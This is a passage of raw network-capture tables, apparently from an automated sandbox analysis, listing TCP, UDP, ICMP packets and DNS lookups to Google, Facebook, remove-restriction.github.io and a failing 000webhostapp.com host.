Feb 6, 2025 01:42:06.594800949 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.594837904 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.594854116 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.594904900 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.594911098 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.594922066 CET	443	49746	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.594953060 CET	49746	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.594958067 CET	443	49746	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.594990015 CET	443	49746	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.595032930 CET	49746	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.595037937 CET	443	49746	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.595072031 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.595117092 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.595124006 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.595525980 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.595572948 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.595580101 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.596506119 CET	49746	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.596537113 CET	443	49746	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.596595049 CET	49746	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.602220058 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.602297068 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.602305889 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.644356966 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.681504965 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681577921 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681610107 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681632042 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.681644917 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681685925 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681687117 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.681695938 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681741953 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.681751013 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681943893 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681976080 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.681986094 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.681996107 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.682030916 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.682030916 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.682041883 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.682087898 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.682903051 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.682971001 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683007002 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683013916 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683022976 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683059931 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683065891 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683109999 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683147907 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683150053 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683161020 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683196068 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683237076 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.683290958 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683676004 CET	49745	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:06.683698893 CET	443	49745	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:06.688254118 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:06.691884041 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:06.691922903 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:06.692902088 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:06.692979097 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:06.694451094 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:06.694514990 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:06.694587946 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:06.694596052 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:06.737145901 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:07.000585079 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:07.000688076 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:07.000760078 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:07.000792980 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:07.001328945 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:07.001404047 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:07.001693964 CET	49747	443	192.168.2.4	157.240.0.35
Feb 6, 2025 01:42:07.001712084 CET	443	49747	157.240.0.35	192.168.2.4
Feb 6, 2025 01:42:07.009898901 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.009924889 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.010000944 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.010200977 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.010212898 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.020772934 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.020829916 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.020900011 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.021073103 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.021087885 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.471369028 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.471929073 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.471946001 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.472973108 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.473061085 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.473376989 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.473439932 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.473495960 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.517291069 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.517303944 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.569960117 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.586621046 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.586740017 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.586771965 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.586812019 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.586839914 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.586883068 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.587094069 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.595748901 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.595787048 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.595841885 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.595849991 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.595896006 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.596254110 CET	49750	443	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:07.596272945 CET	443	49750	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:07.734302044 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.736859083 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.736898899 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.737773895 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.737855911 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.739486933 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.739546061 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.739962101 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:07.739970922 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:07.782857895 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:08.008121967 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:08.008209944 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:08.008269072 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:08.008268118 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:08.008302927 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:08.008321047 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:08.008325100 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:08.008368015 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:08.042402029 CET	49751	443	192.168.2.4	157.240.253.35
Feb 6, 2025 01:42:08.042424917 CET	443	49751	157.240.253.35	192.168.2.4
Feb 6, 2025 01:42:13.679069996 CET	443	49738	216.58.206.68	192.168.2.4
Feb 6, 2025 01:42:13.679136038 CET	443	49738	216.58.206.68	192.168.2.4
Feb 6, 2025 01:42:13.679217100 CET	49738	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:42:15.409751892 CET	49738	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:42:15.409778118 CET	443	49738	216.58.206.68	192.168.2.4
Feb 6, 2025 01:42:15.690129995 CET	49723	80	192.168.2.4	2.22.50.110
Feb 6, 2025 01:42:15.695091963 CET	80	49723	2.22.50.110	192.168.2.4
Feb 6, 2025 01:42:15.695147991 CET	49723	80	192.168.2.4	2.22.50.110
Feb 6, 2025 01:42:49.299118996 CET	49741	80	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:49.306911945 CET	80	49741	185.199.108.153	192.168.2.4
Feb 6, 2025 01:42:49.752257109 CET	49740	80	192.168.2.4	185.199.108.153
Feb 6, 2025 01:42:49.757230043 CET	80	49740	185.199.108.153	192.168.2.4
Feb 6, 2025 01:43:03.050314903 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:03.050355911 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.050436974 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:03.050664902 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:03.050676107 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.847559929 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.848007917 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:03.848025084 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.848539114 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.848864079 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:03.848931074 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:03.892823935 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:04.689814091 CET	49724	80	192.168.2.4	199.232.214.172
Feb 6, 2025 01:43:04.694869995 CET	80	49724	199.232.214.172	192.168.2.4
Feb 6, 2025 01:43:04.694926023 CET	49724	80	192.168.2.4	199.232.214.172
Feb 6, 2025 01:43:05.410197020 CET	49741	80	192.168.2.4	185.199.108.153
Feb 6, 2025 01:43:05.415380001 CET	80	49741	185.199.108.153	192.168.2.4
Feb 6, 2025 01:43:05.415433884 CET	49741	80	192.168.2.4	185.199.108.153
Feb 6, 2025 01:43:13.724277973 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:13.724335909 CET	443	49820	216.58.206.68	192.168.2.4
Feb 6, 2025 01:43:13.724380016 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:15.410573006 CET	49820	443	192.168.2.4	216.58.206.68
Feb 6, 2025 01:43:15.410608053 CET	443	49820	216.58.206.68	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 6, 2025 01:41:59.129642963 CET	53	58884	1.1.1.1	192.168.2.4
Feb 6, 2025 01:41:59.131921053 CET	53	65157	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:00.213895082 CET	53	61153	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:02.987196922 CET	50506	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:02.987332106 CET	60287	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:02.993804932 CET	53	60287	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:02.994267941 CET	53	50506	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:04.274085045 CET	55070	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:04.274410963 CET	62291	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:04.283360958 CET	53	55070	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:04.283579111 CET	53	62291	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:04.754534006 CET	51076	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:04.754683018 CET	53605	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:04.763478994 CET	53	51076	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:04.764256001 CET	53	53605	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:06.029500961 CET	57652	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:06.029743910 CET	50928	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:06.036345005 CET	53	50928	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:06.036449909 CET	53	57652	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:06.789861917 CET	53	61437	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:07.013022900 CET	59905	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:07.013226032 CET	62280	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:07.019699097 CET	53	59905	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:07.020292997 CET	53	62280	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:16.274765015 CET	138	138	192.168.2.4	192.168.2.255
Feb 6, 2025 01:42:17.260513067 CET	53	59054	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:19.418490887 CET	63996	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:19.418864965 CET	64459	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:20.439675093 CET	55536	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:20.440110922 CET	61081	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:22.472037077 CET	58332	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:23.428364038 CET	53	64459	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:23.475569963 CET	58332	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:24.448745966 CET	53	55536	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:24.449831009 CET	53	61081	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:24.487710953 CET	58332	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:25.329241037 CET	53	63996	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:26.482230902 CET	53	58332	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:26.482247114 CET	53	58332	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:26.482254982 CET	53	58332	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:26.510296106 CET	49443	53	192.168.2.4	8.8.8.8
Feb 6, 2025 01:42:26.510448933 CET	53212	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:26.517086983 CET	53	53212	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:26.518598080 CET	53	49443	8.8.8.8	192.168.2.4
Feb 6, 2025 01:42:36.156843901 CET	53	62639	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:51.237675905 CET	61528	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:52.252649069 CET	61528	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:53.268012047 CET	61528	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:42:55.246788025 CET	53	61528	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:55.246802092 CET	53	61528	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:55.246822119 CET	53	61528	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:58.668553114 CET	53	57068	1.1.1.1	192.168.2.4
Feb 6, 2025 01:42:59.213663101 CET	53	49476	1.1.1.1	192.168.2.4
Feb 6, 2025 01:43:11.669789076 CET	49966	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:43:12.674448013 CET	49966	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:43:13.689884901 CET	49966	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:43:15.689867020 CET	49966	53	192.168.2.4	1.1.1.1
Feb 6, 2025 01:43:17.579603910 CET	53	49966	1.1.1.1	192.168.2.4
Feb 6, 2025 01:43:17.579617977 CET	53	49966	1.1.1.1	192.168.2.4
Feb 6, 2025 01:43:17.579627037 CET	53	49966	1.1.1.1	192.168.2.4
Feb 6, 2025 01:43:17.579636097 CET	53	49966	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 6, 2025 01:42:23.428463936 CET	192.168.2.4	1.1.1.1	c1fa	(Port unreachable)	Destination Unreachable
Feb 6, 2025 01:42:24.448920965 CET	192.168.2.4	1.1.1.1	c1fa	(Port unreachable)	Destination Unreachable
Feb 6, 2025 01:42:25.329303980 CET	192.168.2.4	1.1.1.1	c1fa	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 6, 2025 01:42:02.987196922 CET	192.168.2.4	1.1.1.1	0x4cca	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:02.987332106 CET	192.168.2.4	1.1.1.1	0x9103	Standard query (0)	www.google.com	65	IN (0x0001)	false
Feb 6, 2025 01:42:04.274085045 CET	192.168.2.4	1.1.1.1	0xc09d	Standard query (0)	remove-restriction.github.io	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.274410963 CET	192.168.2.4	1.1.1.1	0xe8ec	Standard query (0)	remove-restriction.github.io	65	IN (0x0001)	false
Feb 6, 2025 01:42:04.754534006 CET	192.168.2.4	1.1.1.1	0x37a9	Standard query (0)	remove-restriction.github.io	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.754683018 CET	192.168.2.4	1.1.1.1	0xfc62	Standard query (0)	remove-restriction.github.io	65	IN (0x0001)	false
Feb 6, 2025 01:42:06.029500961 CET	192.168.2.4	1.1.1.1	0xf655	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:06.029743910 CET	192.168.2.4	1.1.1.1	0x12d5	Standard query (0)	www.facebook.com	65	IN (0x0001)	false
Feb 6, 2025 01:42:07.013022900 CET	192.168.2.4	1.1.1.1	0x888a	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:07.013226032 CET	192.168.2.4	1.1.1.1	0x8f79	Standard query (0)	www.facebook.com	65	IN (0x0001)	false
Feb 6, 2025 01:42:19.418490887 CET	192.168.2.4	1.1.1.1	0x16aa	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:19.418864965 CET	192.168.2.4	1.1.1.1	0x58d8	Standard query (0)	practiced-dockings.000webhostapp.com	65	IN (0x0001)	false
Feb 6, 2025 01:42:20.439675093 CET	192.168.2.4	1.1.1.1	0x3d33	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:20.440110922 CET	192.168.2.4	1.1.1.1	0x131f	Standard query (0)	practiced-dockings.000webhostapp.com	65	IN (0x0001)	false
Feb 6, 2025 01:42:22.472037077 CET	192.168.2.4	1.1.1.1	0xbfb1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:23.475569963 CET	192.168.2.4	1.1.1.1	0xbfb1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:24.487710953 CET	192.168.2.4	1.1.1.1	0xbfb1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.510296106 CET	192.168.2.4	8.8.8.8	0x4672	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.510448933 CET	192.168.2.4	1.1.1.1	0x2989	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:51.237675905 CET	192.168.2.4	1.1.1.1	0xcff1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:52.252649069 CET	192.168.2.4	1.1.1.1	0xcff1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:53.268012047 CET	192.168.2.4	1.1.1.1	0xcff1	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:11.669789076 CET	192.168.2.4	1.1.1.1	0xa372	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:12.674448013 CET	192.168.2.4	1.1.1.1	0xa372	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:13.689884901 CET	192.168.2.4	1.1.1.1	0xa372	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:15.689867020 CET	192.168.2.4	1.1.1.1	0xa372	Standard query (0)	practiced-dockings.000webhostapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 6, 2025 01:42:02.993804932 CET	1.1.1.1	192.168.2.4	0x9103	No error (0)	www.google.com			65	IN (0x0001)	false
Feb 6, 2025 01:42:02.994267941 CET	1.1.1.1	192.168.2.4	0x4cca	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.283360958 CET	1.1.1.1	192.168.2.4	0xc09d	No error (0)	remove-restriction.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.283360958 CET	1.1.1.1	192.168.2.4	0xc09d	No error (0)	remove-restriction.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.283360958 CET	1.1.1.1	192.168.2.4	0xc09d	No error (0)	remove-restriction.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.283360958 CET	1.1.1.1	192.168.2.4	0xc09d	No error (0)	remove-restriction.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.763478994 CET	1.1.1.1	192.168.2.4	0x37a9	No error (0)	remove-restriction.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.763478994 CET	1.1.1.1	192.168.2.4	0x37a9	No error (0)	remove-restriction.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.763478994 CET	1.1.1.1	192.168.2.4	0x37a9	No error (0)	remove-restriction.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:04.763478994 CET	1.1.1.1	192.168.2.4	0x37a9	No error (0)	remove-restriction.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:06.036345005 CET	1.1.1.1	192.168.2.4	0x12d5	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2025 01:42:06.036345005 CET	1.1.1.1	192.168.2.4	0x12d5	No error (0)	star-mini.c10r.facebook.com			65	IN (0x0001)	false
Feb 6, 2025 01:42:06.036345005 CET	1.1.1.1	192.168.2.4	0x12d5	No error (0)	star-mini.c10r.facebook.com			65	IN (0x0001)	false
Feb 6, 2025 01:42:06.036449909 CET	1.1.1.1	192.168.2.4	0xf655	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2025 01:42:06.036449909 CET	1.1.1.1	192.168.2.4	0xf655	No error (0)	star-mini.c10r.facebook.com		157.240.0.35	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:07.019699097 CET	1.1.1.1	192.168.2.4	0x888a	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2025 01:42:07.019699097 CET	1.1.1.1	192.168.2.4	0x888a	No error (0)	star-mini.c10r.facebook.com		157.240.253.35	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:07.020292997 CET	1.1.1.1	192.168.2.4	0x8f79	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 6, 2025 01:42:07.020292997 CET	1.1.1.1	192.168.2.4	0x8f79	No error (0)	star-mini.c10r.facebook.com			65	IN (0x0001)	false
Feb 6, 2025 01:42:07.020292997 CET	1.1.1.1	192.168.2.4	0x8f79	No error (0)	star-mini.c10r.facebook.com			65	IN (0x0001)	false
Feb 6, 2025 01:42:23.428364038 CET	1.1.1.1	192.168.2.4	0x58d8	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	65	IN (0x0001)	false
Feb 6, 2025 01:42:24.448745966 CET	1.1.1.1	192.168.2.4	0x3d33	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:24.449831009 CET	1.1.1.1	192.168.2.4	0x131f	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	65	IN (0x0001)	false
Feb 6, 2025 01:42:25.329241037 CET	1.1.1.1	192.168.2.4	0x16aa	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.482230902 CET	1.1.1.1	192.168.2.4	0xbfb1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.482247114 CET	1.1.1.1	192.168.2.4	0xbfb1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.482254982 CET	1.1.1.1	192.168.2.4	0xbfb1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:26.517086983 CET	1.1.1.1	192.168.2.4	0x2989	No error (0)	google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
